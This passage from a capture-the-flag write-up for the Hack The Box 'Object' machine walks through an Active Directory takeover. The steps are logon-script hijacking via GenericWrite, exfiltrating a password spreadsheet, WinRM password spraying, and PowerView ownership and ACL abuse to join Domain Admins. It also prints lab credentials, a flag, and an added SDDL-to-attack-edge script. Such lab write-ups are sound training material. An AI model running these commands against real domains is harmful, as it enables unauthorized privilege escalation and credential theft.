Warning: [Set-DomainObject] Error setting/replacing properties for object 'smith' : Exception calling "CommitChanges" with "0" argument(s): "Access is denied.
"
*Evil-WinRM* PS C:\Users\smith\Documents> $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\smith\Documents> $Cred = New-Object System.Management.Automation.PSCredential('OBJECT.LOCAL\smith', $SecPassword)
*Evil-WinRM* PS C:\Users\smith\Documents> Set-DomainObject -Credential $Cred -Identity smith -SET @{serviceprincipalname='nonexistent/BLAHBLAH'}
Warning: [Set-DomainObject] Error setting/replacing properties for object 'smith' : Exception calling "CommitChanges" with "0" argument(s): "Access is denied.
"
*Evil-WinRM* PS C:\Users\smith\Documents>

26. Both attempts fail because they target the wrong object: the GenericWrite edge is smith over maria, so -Identity must be maria, not smith (smith has no write access to his own SPN). The reference walkthroughs use the same right a different way: GenericWrite also covers maria's scriptPath attribute, her logon script. Pointing it at a script we control makes that script run as maria at her next logon, and since out.txt appears within seconds of the change, something on the box logs on as maria on a schedule. An absolute local path works here only because the script is executed on the DC itself; in a normal domain scriptPath is relative to the NETLOGON share

Set-DomainObject -Identity [USER] -SET @{scriptpath='[SCRIPT-PATH]'}

# Create the script under C:\Temp so there are no permission problems, with this content:

dir C:\Users\maria\Desktop > C:\Temp\out.txt


Set-DomainObject -Identity maria -SET @{scriptpath='C:\Temp\test.ps1'}


*Evil-WinRM* PS C:\Users\smith\Documents> mkdir C:/Temp


Directory: C:\


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/15/2024 8:00 AM Temp


*Evil-WinRM* PS C:\Users\smith\Documents> cd C:/Temp
*Evil-WinRM* PS C:\Temp>



*Evil-WinRM* PS C:\Temp> upload /home/kali/Desktop/test.ps1

Info: Uploading /home/kali/Desktop/test.ps1 to C:\Temp\test.ps1

Data: 60 bytes of 60 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Temp> Set-DomainObject -Identity maria -SET @{scriptpath='C:\Temp\test.ps1'}
*Evil-WinRM* PS C:\Temp> ls


Directory: C:\Temp


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/15/2024 8:06 AM 830 out.txt
-a---- 4/15/2024 8:06 AM 45 test.ps1


*Evil-WinRM* PS C:\Temp> cat out.txt


Directory: C:\Users\maria\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/26/2021 8:13 AM 6144 Engines.xls


*Evil-WinRM* PS C:\Temp>

27. maria's Desktop holds a single file, Engines.xls. A second script, file.ps1 (60 bytes, contents not shown here), copies it into C:\Temp the same way, as the listing confirms, and we download it

*Evil-WinRM* PS C:\Temp> upload /home/kali/Desktop/file.ps1

Info: Uploading /home/kali/Desktop/file.ps1 to C:\Temp\file.ps1

Data: 80 bytes of 80 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Temp> Set-DomainObject -Identity maria -SET @{scriptpath='C:\Temp\file.ps1'}
*Evil-WinRM* PS C:\Temp> ls


Directory: C:\Temp


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/26/2021 8:13 AM 6144 Engines.xls
-a---- 4/15/2024 8:09 AM 60 file.ps1
-a---- 4/15/2024 8:09 AM 830 out.txt
-a---- 4/15/2024 8:06 AM 45 test.ps1


*Evil-WinRM* PS C:\Temp> download Engines.xls

Info: Downloading C:\Temp\Engines.xls to Engines.xls

Info: Download successful!
*Evil-WinRM* PS C:\Temp>

http://sh1yan.top/photo/Object-htb-writeup/Engines.xls

Name                        Quantity  Date Acquired  Owner  Chamber Username  Chamber Password
Internal Combustion Engine  12        10/02/21       HTB    maria             d34gb8@
Stirling Engine             23        11/05/21       HTB    maria             0de_434_d545
Diesel Engine               4         02/03/21       HTB    maria             W3llcr4ft3d_4cls

28. Three candidate passwords for maria. Put them in a file and spray them over WinRM to see which one is current

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec winrm 10.10.11.132 -u maria -p ./passwd.txt
SMB 10.10.11.132 5985 NONE [*] None (name:10.10.11.132) (domain:None)
HTTP 10.10.11.132 5985 NONE [*] http://10.10.11.132:5985/wsman
WINRM 10.10.11.132 5985 NONE [-] None\maria:d34gb8@
WINRM 10.10.11.132 5985 NONE [-] None\maria:0de_434_d545
WINRM 10.10.11.132 5985 NONE [+] None\maria:W3llcr4ft3d_4cls (Pwn3d!)
WINRM 10.10.11.132 5985 NONE [-] None\maria:W3llcr4ft3d_4cls "'NoneType' object has no attribute 'upper'"

29. W3llcr4ft3d_4cls is valid (the trailing 'NoneType' line is a crackmapexec error after the successful attempt, not a second failure). Log in as maria

┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i 10.10.11.132 -u maria -p 'W3llcr4ft3d_4cls'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\maria\Documents>
*Evil-WinRM* PS C:\Users\maria\Documents> whoami
object\maria
*Evil-WinRM* PS C:\Users\maria\Documents>

30. This is the last account in the chain. BloodHound's abuse info for maria:

The user MARIA@OBJECT.LOCAL has the ability to modify the owner of the group DOMAIN ADMINS@OBJECT.LOCAL.

Object owners retain the ability to modify object security descriptors, regardless of permissions on the object's DACL.


To change the ownership of the object, you may use the Set-DomainObjectOwner function in PowerView.

You may need to authenticate to the Domain Controller as MARIA@OBJECT.LOCAL if you are not running a process as that user. To do this in conjunction with Set-DomainObjectOwner, first create a PSCredential object (these examples come from the PowerView help documentation):

$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

Then, use Set-DomainObjectOwner, optionally specifying $Cred if you are not already running a process as MARIA@OBJECT.LOCAL:

Set-DomainObjectOwner -Credential $Cred -TargetIdentity "Domain Admins" -OwnerIdentity harmj0y

To abuse ownership of a group object, you may grant yourself the AddMember privilege. This can be accomplished using the Add-DomainObjectAcl function in PowerView.

You may need to authenticate to the Domain Controller as MARIA@OBJECT.LOCAL if you are not running a process as that user. To do this in conjunction with Add-DomainObjectAcl, first create a PSCredential object (these examples come from the PowerView help documentation):

$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

Then, use Add-DomainObjectAcl, optionally specifying $Cred if you are not already running a process as MARIA@OBJECT.LOCAL:

Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Domain Admins" -Rights WriteMembers
You can now add members to the group using the net binary or PowerView's Add-DomainGroupMember.

There are at least two ways to execute this attack. The first and most obvious is by using the built-in net.exe binary in Windows (e.g.: net group "Domain Admins" harmj0y /add /domain). See the opsec considerations tab for why this may be a bad idea. The second, and highly recommended method, is by using the Add-DomainGroupMember function in PowerView. This function is superior to using the net.exe binary in several ways. For instance, you can supply alternate credentials, instead of needing to run a process as or logon as the user with the AddMember privilege. Additionally, you have much safer execution options than you do with spawning net.exe (see the opsec tab).

To abuse this privilege with PowerView's Add-DomainGroupMember, first import PowerView into your agent session or into a PowerShell instance at the console. You may need to authenticate to the Domain Controller as MARIA@OBJECT.LOCAL if you are not running a process as that user. To do this in conjunction with Add-DomainGroupMember, first create a PSCredential object (these examples come from the PowerView help documentation):

$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

Then, use Add-DomainGroupMember, optionally specifying $Cred if you are not already running a process as MARIA@OBJECT.LOCAL:

Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y' -Credential $Cred

Finally, verify that the user was successfully added to the group with PowerView's Get-DomainGroupMember:

Get-DomainGroupMember -Identity 'Domain Admins'

Cleanup can be done using Remove-DomainObjectAcl

Remove-DomainObjectAcl -Credential $cred -TargetIdentity "Domain Admins" -Rights WriteMembers

Cleanup for the owner can be done by using Set-DomainObjectOwner once again
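The three edges BloodHound reported on this box (ForceChangePassword, GenericWrite, WriteOwner) are nothing more than ACEs in the targets' security descriptors. As an added example written for this page (it is not the page's code and not BloodHound's), the script below parses SDDL strings and maps allow ACEs to the edge names using the same rules SharpHound applies: the GenericAll, GenericWrite, WriteOwner and WriteDacl bits map directly; WriteProperty with no object GUID counts as GenericWrite; a control-access right scoped to the User-Force-Change-Password GUID is ForceChangePassword and an unscoped one is AllExtendedRights; WriteProperty on the member attribute is AddMember. The SIDs and descriptors are constructed to mirror the oliver -> smith -> maria -> Domain Admins chain and are not values from the target; deny ACEs and inheritance flags are ignored for brevity.

```python
"""Derive BloodHound-style ACL edges from SDDL strings (added example)."""
import re

# Extended-right / attribute GUIDs behind the edges seen in this write-up.
GUID_FORCE_CHANGE_PASSWORD = "00299570-246d-11d0-a768-00aa006e0529"  # User-Force-Change-Password
GUID_MEMBER_ATTRIBUTE = "bf9679c0-0de6-11d1-a285-00aa003049e2"       # "member" attribute

# Two-letter SDDL right codes -> access-mask bits (the subset needed here).
RIGHT_BITS = {
    "GA": 0x10000000, "GW": 0x40000000, "GR": 0x80000000, "GX": 0x20000000,
    "WO": 0x00080000, "WD": 0x00040000, "RC": 0x00020000, "SD": 0x00010000,
    "CC": 0x01, "DC": 0x02, "LC": 0x04, "SW": 0x08, "RP": 0x10, "WP": 0x20,
    "DT": 0x40, "LO": 0x80, "CR": 0x100,
}
GENERIC_ALL, GENERIC_WRITE = 0x10000000, 0x40000000
WRITE_OWNER, WRITE_DACL = 0x00080000, 0x00040000
WRITE_PROP, CONTROL_ACCESS = 0x20, 0x100


def parse_rights(field):
    """'RPWPCR' or '0x20' -> access mask."""
    if field.lower().startswith("0x"):
        return int(field, 16)
    mask = 0
    for i in range(0, len(field), 2):
        mask |= RIGHT_BITS[field[i:i + 2]]
    return mask


def parse_sddl(sddl):
    """Split 'O:...G:...D:...' into (owner SID, [(type, mask, object GUID, SID)])."""
    parts = re.split(r"([OGDS]):", sddl)
    sections = dict(zip(parts[1::2], parts[2::2]))
    aces = []
    for ace in re.findall(r"\(([^)]*)\)", sections.get("D", "")):
        fields = ace.split(";")
        kind, rights, obj_guid, sid = fields[0], fields[2], fields[3].lower(), fields[5]
        aces.append((kind, parse_rights(rights), obj_guid, sid))
    return sections.get("O"), aces


def edges_from_ace(kind, mask, obj_guid, sid):
    """Map one ACE to the BloodHound edge names it would produce."""
    if kind not in ("A", "OA"):          # deny ACEs are skipped (simplification)
        return []
    edges = []
    if mask & GENERIC_ALL:
        edges.append("GenericAll")
    if mask & WRITE_OWNER:
        edges.append("WriteOwner")
    if mask & WRITE_DACL:
        edges.append("WriteDacl")
    # GenericWrite bit, or WriteProperty that is not limited to one attribute
    if mask & GENERIC_WRITE or (mask & WRITE_PROP and not obj_guid):
        edges.append("GenericWrite")
    if mask & CONTROL_ACCESS:
        if not obj_guid:
            edges.append("AllExtendedRights")
        elif obj_guid == GUID_FORCE_CHANGE_PASSWORD:
            edges.append("ForceChangePassword")
    if mask & WRITE_PROP and obj_guid == GUID_MEMBER_ATTRIBUTE:
        edges.append("AddMember")
    return [(sid, e) for e in edges]


def abusable_edges(target, sddl, names):
    """Return [(principal, edge, target)] for the owner and every allow ACE."""
    owner, aces = parse_sddl(sddl)
    found = []
    if owner in names:
        found.append((names[owner], "Owns", target))
    for ace in aces:
        for sid, edge in edges_from_ace(*ace):
            found.append((names.get(sid, sid), edge, target))
    return found


# Constructed sample: made-up SIDs and descriptors that mirror the chain on this box.
SIDS = {
    "S-1-5-21-1-2-3-1105": "oliver", "S-1-5-21-1-2-3-1106": "smith",
    "S-1-5-21-1-2-3-1107": "maria", "DA": "Domain Admins",
}
SAMPLE = {
    "smith": "O:DAG:DUD:(A;;RPLCLORC;;;AU)"
             "(OA;;CR;00299570-246d-11d0-a768-00aa006e0529;;S-1-5-21-1-2-3-1105)",
    "maria": "O:DAG:DUD:(A;;RPLCLORC;;;AU)(D;;GA;;;S-1-5-21-1-2-3-1106)"
             "(A;;RPWP;;;S-1-5-21-1-2-3-1106)",
    "Domain Admins": "O:DAG:DAD:(A;;RPLCLORC;;;AU)(A;;WO;;;S-1-5-21-1-2-3-1107)",
}


def attack_path():
    """The non-owner edges across the sample, in the order an attacker walks them."""
    path = []
    for target, sddl in SAMPLE.items():
        path.extend(e for e in abusable_edges(target, sddl, SIDS) if e[1] != "Owns")
    return path


if __name__ == "__main__":
    for principal, edge, target in attack_path():
        print("%s --%s--> %s" % (principal, edge, target))
```

Feeding it real descriptors is a one-liner in PowerShell: (Get-Acl "AD:\<DN>").Sddl, or the ntSecurityDescriptor attribute over LDAP. The useful check after the WriteOwner abuse above is to run the Domain Admins descriptor through it again: the owner is now maria and, after Add-DomainObjectAcl, a new ACE for her SID shows up as GenericAll.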

31. The final step, following the reference walkthrough. Note that PowerView's Set-DomainObjectOwner takes -Identity for the target, not the -TargetIdentity shown in the BloodHound text

Import-Module .\PowerView.ps1

Make maria the owner of the Domain Admins group.

Set-DomainObjectOwner -Identity "Domain Admins" -OwnerIdentity maria

As owner, grant maria full rights on the group (WriteMembers alone would be enough).

Add-DomainObjectAcl -PrincipalIdentity maria -TargetIdentity "Domain Admins" -Rights All

Finally add maria to Domain Admins.

net group "Domain Admins" maria /add /domain

As the last step, look for the flags.

Get-ChildItem -Path C:\Users -Recurse -Include root.txt,user.txt | select Fullname

32. Execute

*Evil-WinRM* PS C:\Users\maria\Documents> ls
*Evil-WinRM* PS C:\Users\maria\Documents> upload /home/kali/Desktop/tools/PowerSploit/PowerView.ps1

Info: Uploading /home/kali/Desktop/tools/PowerSploit/PowerView.ps1 to C:\Users\maria\Documents\PowerView.ps1

Data: 1027036 bytes of 1027036 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\maria\Documents> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\Users\maria\Documents> Set-DomainObjectOwner -Identity "Domain Admins" -OwnerIdentity maria
*Evil-WinRM* PS C:\Users\maria\Documents> Add-DomainObjectAcl -PrincipalIdentity maria -TargetIdentity "Domain Admins" -Rights All
*Evil-WinRM* PS C:\Users\maria\Documents> net group "Domain Admins" maria /add /domain
The command completed successfully.

*Evil-WinRM* PS C:\Users\maria\Documents> Get-ChildItem -Path C:\Users -Recurse -Include root.txt,user.txt | select Fullname
Access to the path 'C:\Users\Administrator' is denied.
At line:1 char:1
+ Get-ChildItem -Path C:\Users -Recurse -Include root.txt,user.txt | se ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (C:\Users\Administrator:String) [Get-ChildItem], UnauthorizedAccessException
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
Access to the path 'C:\Users\oliver' is denied.
At line:1 char:1
+ Get-ChildItem -Path C:\Users -Recurse -Include root.txt,user.txt | se ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (C:\Users\oliver:String) [Get-ChildItem], UnauthorizedAccessException
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
Access to the path 'C:\Users\Public' is denied.
At line:1 char:1
+ Get-ChildItem -Path C:\Users -Recurse -Include root.txt,user.txt | se ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (C:\Users\Public:String) [Get-ChildItem], UnauthorizedAccessException
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
Access to the path 'C:\Users\smith' is denied.
At line:1 char:1
+ Get-ChildItem -Path C:\Users -Recurse -Include root.txt,user.txt | se ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (C:\Users\smith:String) [Get-ChildItem], UnauthorizedAccessException
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
*Evil-WinRM* PS C:\Users\maria\Documents>

33. The access-denied errors are expected: group membership is put into the access token at logon, so the current session does not yet carry Domain Admins. Reconnecting as maria produces a fresh token and the final flag

┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i 10.10.11.132 -u maria -p 'W3llcr4ft3d_4cls'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\maria\Documents> Get-ChildItem -Path C:\Users -Recurse -Include root.txt,user.txt | select Fullname

FullName
--------
C:\Users\Administrator\Desktop\root.txt
C:\Users\oliver\Desktop\user.txt


*Evil-WinRM* PS C:\Users\maria\Documents> cat C:\Users\Administrator\Desktop\root.txt
03701254829c810c8a18df6bed370be2
*Evil-WinRM* PS C:\Users\maria\Documents>

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/447


https://sh1yan.top/2024/04/15/Object-htb-writeup/
Author: shiyan
Published: April 15, 2024